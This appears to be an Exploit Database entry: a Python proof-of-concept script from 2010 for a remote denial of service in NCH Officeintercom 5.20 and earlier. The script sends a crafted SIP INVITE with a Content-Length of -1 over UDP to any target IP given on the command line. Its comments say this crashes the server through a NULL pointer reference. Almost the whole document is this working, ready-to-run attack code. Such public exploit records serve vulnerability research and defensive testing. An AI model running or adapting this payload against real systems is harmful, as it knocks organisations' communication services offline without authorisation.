NCH Officeintercom 5.20 – Remote Denial of Service

• Exploit Database
• 12 阅读

• 作者： xsploited security
  日期： 2010-11-25
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15613/

• #!/usr/bin/python
  
  # Exploit Title: NCH Officeintercom <= v5.20 Remote Denial of Service Vulnerability
  # Date: 11/24/2010
  # Author: xsploited security
  # URL: http://www.x-sploited.com/
  # Contact: xsploitedsecurity [at] x-sploited.com
  # Software Link: http://www.nch.com.au/oi/oisetup.exe
  # Version: <= v5.20
  # Tested on: Windows XP SP3
  # CVE : N/A
  
  ### Software Description: ###
  # Officeintercom lets you use your PC, Pocket PC and Smartphone to speak to others over the internet or a local area
  # network with simple "push-to-talk" technology. It works as a virtual IP intercom and feels a little like using a CB
  # radio. 
  # Talk to anyone else who has installed OfficeIntercom anywhere in the world from your PC or Pocket PC device. OfficeIntercom
  # is designed to be fast and easy to use and, in an office environment, no cabling is be required to run OfficeIntercom
  # because it uses the existing computer network. 
  
  ### Exploit information: ###
  # NCH Office Intercom is prone to a remote denial of service attack when parsing a maliscous SIP invite request.
  # If the Content-Length field has a value of -1 (or a large integer such as 3645363) the server will crash due to a NULL pointer
  # reference, causing an access violation.
  
  ### Shouts: ###
  # kaotix, MaX, corelanc0d3r/corelan team, exploit-db, packetstormsecurity, all other infosec researchers and websites
  #
  # "When you know that you're capable of dealing with whatever comes, you have the only security the world has to offer."
  #			-Harry Browne
  ###
  
  import sys,socket
  
  if len(sys.argv) < 2:
  print "[!] Error, Usage: " + sys.argv[0]+ " <Target IP> [Port]"
  sys.exit(1)
  
  about = "================================================\n"
  about += "Title: Officeintercom <= v5.20 Remote DoS POC\n"
  about +="Author: xsploited security\nURL: http://www.x-sploited.com/\n"
  about +="Contact: xsploitedsecurity [at] gmail.com\n"
  about +="Shouts: kAoTiX, MaX, corelanc0d3r/corelan team,\nexploit-db, packetstormsecurity, and all other sites\n"
  about +="================================================\n"
  print about
  
  host = sys.argv[1]
  
  if len(sys.argv) > 2:
  port = int(sys.argv[2])
  else:
  port = 5060 #Default
  
  payload = ("INVITE sip:105@" + host + " SIP/2.0\r\n"
  "To: <sip:" + host + ":5060>\r\n"
  "Via: SIP/2.0/UDP localhost:10000\r\n"
  "From: \x22xsploitedsec\x22<sip:" + host + ":10000>\r\n"
  "Call-ID: f81d4fae7dec11d0a76500a0c91e6bf6@localhost\r\n"
  "CSeq: 1 INVITE\r\n"
  "Max-Forwards: 70\r\n"
  "Content-Type: application/sdp\r\n"
  "Content-Length: -1\r\n\r\n");
  
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  print "[*] Sending evil SIP request to " + host + ":" + str(port)
  s.sendto(payload,(host,port))
  print "[*] Data sent successfully"
  print "[*] Exiting..."
  s.close()